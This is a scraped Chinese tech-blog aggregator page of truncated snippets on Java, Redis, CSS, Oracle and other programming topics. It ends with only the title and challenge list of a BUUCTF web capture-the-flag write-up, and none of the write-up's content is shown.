TA是什么一款智能化的编码分析解码工具，对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位（最新的版本不兼容，32位的也不行）PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件，r修改成rb即可。使用标准语
分布式锁和spring事务管理暴躁的鱼锁及事务分布式 spring java
最近开发一个小程序遇到一个需求需要实现分布式事务管理业务需求用户在使用小程序的过程中可以查看景点，对景点地区或者城市标记是否想去，那么需要统计一个地点被标记的人数，以及记录某个用户对某个地点是否标记为想去，用两个表存储数据，一个地点表记录改地点被标记的次数，一个用户意向表记录某个用户对某个地点是否标记为想去。由于可能有多个用户同时标记一个地点，每个用户在前端点击想去按钮之后，后台接收到请求，从数据
前端CSS面试常见题剑亦未配妥前端面试前端 css 面试
边界塌陷盒模型有两种：W3C盒模型和IE盒模型，区别在于宽度是否包含边框定义：同时给兄弟/父子盒模型设置上下边距，理论上边距值是两者之和，实际上不是注意：浮动和定位不会产生边界塌陷；只有块级元素垂直方向才会产生margin合并margin计算方案margin同为正负：取绝对值大的值一正一负：求和父子元素边界塌陷解决父元素可以通过调整padding处理；设置overflowhidden，触发BFC子
【JS】前端文件读取FileReader操作总结程序员-张师傅前端前端 javascript 开发语言
前端文件读取FileReader操作总结FileReader是JavaScript中的一个WebAPI，它允许web应用程序异步读取用户计算机上的文件（或原始数据缓冲区）的内容，例如读取文件以获取其内容，并在不将文件发送到服务器的情况下在客户端使用它。这对于处理图片、文本文件等非常有用，尤其是当你想要在用户界面中即时显示文件内容或进行文件预览时。创建FileReader对象首先，你需要创建一个Fi
JAVA基础灵静志远位运算加载 Date 字符串池覆盖
一、类的初始化顺序 1 （静态变量，静态代码块）-->（变量，初始化块）--> 构造器同一括号里的，根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况，那就在父类到子类交替初始化。二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象，根
keepalived实现redis主从高可用 bylijinnan redis
方案说明两台机器（称为A和B），以统一的VIP对外提供服务 1.正常情况下，A和B都启动，B会把A的数据同步过来（B is slave of A） 2.当A挂了后，VIP漂移到B；B的keepalived 通知redis 执行：slaveof no one，由B提供服务 3.当A起来后，VIP不切换，仍在B上面；而A的keepalived 通知redis 执行slaveof B，开始
java文件操作大全 0624chenhong java
最近在博客园看到一篇比较全面的文件操作文章，转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息 &nbs
android学习任务不懂事的小屁孩工作
任务完成情况搞清楚带箭头的pupupwindows和不带的使用已完成熟练使用pupupwindows和alertdialog，并搞清楚两者的区别已完成熟练使用android的线程handler,并敲示例代码进行中了解游戏2048的流程，并完成其代码工作进行中-差几个actionbar 研究一下android的动画效果，写一个实例已完成复习fragem
zoom.js 换个号韩国红果果 oom
它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
当Oracle发布Solaris 11时，它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是，这些说法没有告诉我们为什么Solaris是配得上云的。幸好，我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用：OpenStack、内核域、统一存档（UA）和弹性虚拟交换（EVS）。
spring学习——springmvc（一） a-john springMVC
Spring MVC基于模型-视图-控制器（Model-View-Controller，MVC）实现，能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。 1，跟踪Spring MVC的请求请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样，Spring MVC所有的请求都会通过一个前端控制器Servlet。前
hdu4342 History repeat itself-------多校联合五 aijuans 数论
水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
EJB和javabean的区别 asia007 bean ejb
EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了 1.EJB用于服务端应用开发, 而JavaBeans
Struts的action和Result总结百合不是茶 struts Action配置 Result配置
一:Action的配置详解: 下面是一个Struts中一个空的Struts.xml的配置文件 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
如何带好自已的团队 bijian1013 项目管理团队管理团队
在网上看到博客" 怎么才能让团队成员好好干活"的评论，觉得写的比较好。原文如下：我做团队管理有几年了吧，我和你分享一下我认为带好团队的几点： 1.诚信对团队内成员，无论是技术研究、交流、问题探讨，要尽可能的保持一种诚信的态度，用心去做好，你的团队会感觉得到。 2.努力提
Java代码混淆工具 sunjing ProGuard
Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
在第二篇中使用2.8.17搭建了主从复制，但是它存在Master单点问题，为了解决这个问题，Redis从2.6开始引入sentinel，用于监控和管理Redis的主从复制环境，进行自动failover，即Master挂了后，sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作，如果Master醒来再次加入集群，只能以从服务器的形式工作。什么是Sentine
使用代理实现Hibernate Dao层自动事务白糖_ DAO spring AOP 框架 Hibernate
都说spring利用AOP实现自动事务处理机制非常好，但在只有hibernate这个框架情况下，我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
maven3实战读书笔记 braveCS maven3
Maven简介是什么？ Is a software project management and comprehension tool.项目管理工具是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复，maven最大化消除了构建的重复] [与XP：简单、交流与反馈；测试驱动开发、十分钟构建、持续集成、富有信息的工作区] 功能：
编程之美-子数组的最大乘积 bylijinnan 编程之美
public class MaxProduct { /** * 编程之美子数组的最大乘积 * 题目: 给定一个长度为N的整数数组，只允许使用乘法，不能用除法，计算任意N-1个数的组合中乘积中最大的一组，并写出算法的时间复杂度。 * 以下程序对应书上两种方法，求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思，是要求得这个子数组，而不
读书笔记-2 chengxuyuancsdn 读书笔记
1、反射 2、oracle年-月-日时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
[求学与房地产]慎重选择IT培训学校 comsci it
关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题培训学校的教学楼和宿舍的环境和稳定性问题我们大家都知道，房子是一个比较昂贵的东西，特别是那种能够当教室的房子... &nb
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oracle rman filesperset PARALLELISM
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道： RMAN > configure device type disk parallelism 3 ; 表示启动三个通道，可以加快备份恢复的速度。
简单排序:冒泡排序 dieslrae 冒泡排序
public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
初二上学期难记单词三 dcj3sjt126com sciet
concert 音乐会 tonight 今晚 famous 有名的；著名的 song 歌曲 thousand 千 accident 事故；灾难 careless 粗心的，大意的 break 折断；断裂；破碎 heart 心（脏） happen 偶尔发生，碰巧 tourist 旅游者；观光者 science （自然）科学 marry 结婚 subject 题目；
I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码收藏代码 dcj3sjt126com redis
wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make 前面3步应该没有问题，主要的问题是执行make的时候，出现了异常。异常一： make[2]: cc: Command not found 异常原因：没有安装g
并发容器 shuizhaosi888 并发容器
通过并发容器来改善同步容器的性能，同步容器将所有对容器状态的访问都串行化，来实现线程安全，这种方式严重降低并发性，当多个线程访问时，吞吐量严重降低。并发容器ConcurrentHashMap 替代同步基于散列的Map，通过Lock控制。 &nb
Spring Security（12）——Remember-Me功能 234390216 Spring Security Remember Me 记住我
Remember-Me功能目录 1.1 概述 1.2 基于简单加密token的方法 1.3 基于持久化token的方法 1.4 Remember-Me相关接口和实现
位运算焦志广位运算
一、位运算符Ｃ语言提供了六种位运算符： & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时，结果位才为1 ，否则为0。参与运算的数以补码方式出现。例如：9&am
nodejs 数据库连接 mongodb mysql liguangsong mongodb mysql node 数据库连接
1.mysql 连接 package.json中dependencies加入 "mysql":"~2.7.0" 执行 npm install 在config 下创建文件 database.js
java动态编译 olive6615 java HotSpot jvm 动态编译
在HotSpot虚拟机中，有两个技术是至关重要的，即动态编译(Dynamic compilation)和Profiling。 HotSpot是如何动态编译Javad的bytecode呢？Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器，即Profile Monitor,专门监视
Storm0.9.5的集群部署配置优化 roadrunners 优化 storm.yaml
nimbus结点配置（storm.yaml）信息： # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
101个MySQL 的调节和优化的提示 tomcat_oracle mysql
　1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。　　2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的，它的速度很慢。　　3. 使用电池供电的RAM（注：RAM即随机存储器）。　　4. 使用高级的RAID（注：Redundant Arrays of Inexpensive Disks，即磁盘阵列
zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
题目链接：zoj 3829 Known Notation 题目大意：给定一个不完整的后缀表达式，要求有2种不同操作，用尽量少的操作使得表达式完整。解题思路：贪心，数字的个数要要保证比∗的个数多1，不够的话优先补在开头是最优的。然后遍历一遍字符串，碰到数字+1，碰到∗-1,保证数字的个数大于等1，如果不够减的话，可以和最后面的一个数字交换位置（用栈维护十分方便），因为添加和交换代价都是1

【CTF】buuctf web 详解（持续更新）

buuctf web

[HCTF 2018]WarmUp

[极客大挑战 2019]EasySQL

[极客大挑战 2019]Havefun

[强网杯 2019]随便注

[ACTF2020 新生赛]Include

[SUCTF 2019]EasySQL

[极客大挑战 2019]Secret File

[ACTF2020 新生赛]Exec

[极客大挑战 2019]LoveSQL

[GXYCTF2019]Ping Ping Ping

[极客大挑战 2019]Knife

[极客大挑战 2019]Http

[RoarCTF 2019]Easy Calc

[极客大挑战 2019]Upload

[极客大挑战 2019]PHP

[护网杯 2018]easy_tornado

[ACTF2020 新生赛]Upload

[极客大挑战 2019]BabySQL

[ACTF2020 新生赛]BackupFile

[HCTF 2018]admin

[极客大挑战 2019]BuyFlag

[BJDCTF2020]Easy MD5

[ZJCTF 2019]NiZhuanSiWei

[SUCTF 2019]CheckIn

[极客大挑战 2019]HardSQL

[网鼎杯 2020 青龙组]AreUSerialz

[MRCTF2020]你传你呢

[MRCTF2020]Ez_bypass

[GXYCTF2019]BabySQli

[CISCN2019 华北赛区 Day2 Web1]Hack World

[GYCTF2020]Blacklist

[网鼎杯 2018]Fakebook

[GXYCTF2019]BabyUpload

[BUUCTF 2018]Online Tool

[RoarCTF 2019]Easy Java

[GXYCTF2019]禁止套娃

[GWCTF 2019]我有一个数据库

你可能感兴趣的:(buuctf,CTF,前端,php,开发语言)